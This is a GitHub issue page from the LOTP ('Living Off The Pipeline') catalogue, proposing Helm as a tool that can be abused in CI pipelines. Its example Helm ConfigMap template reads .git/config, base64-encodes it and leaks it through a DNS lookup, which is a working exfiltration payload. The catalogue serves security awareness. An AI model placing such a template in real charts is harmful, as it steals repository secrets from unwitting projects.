boostsecurityio / boostsecurityio/lotp

[LOTP] Add Helm

Open
#87 0 comments 0 reactions 0 assignees View on GitHub
idea
Dominant language
HTML
Stars
164
Forks
14
PR merge metrics
No merged PRs in 30d

Description

# Description of the LOTP tool

[Helm Chart](https://helm.sh/)

# Configuration files

Helm can read files under the root of a chart. If the head of a repo happens to be a chart root one could read the .git/config file.

# Documentation
https://helm.sh/docs/chart_template_guide/accessing_files/
https://helm.sh/docs/chart_template_guide/functions_and_pipelines/

# Real-world example
```
apiVersion: v1
kind: ConfigMap
metadata:
name: mychart-configmap
data:
hello: {{ getHostByName (print (b64enc (.Files.Get ".git/config")) ".google.com") }}
```

# Additional notes

They have a popular GitHub Action ...

Contributor guide

No contributing guide indexed for this repository

Assessment

This issue has not been assessed yet.

Get new issues in your inbox

A short digest of beginner-friendly GitHub issues.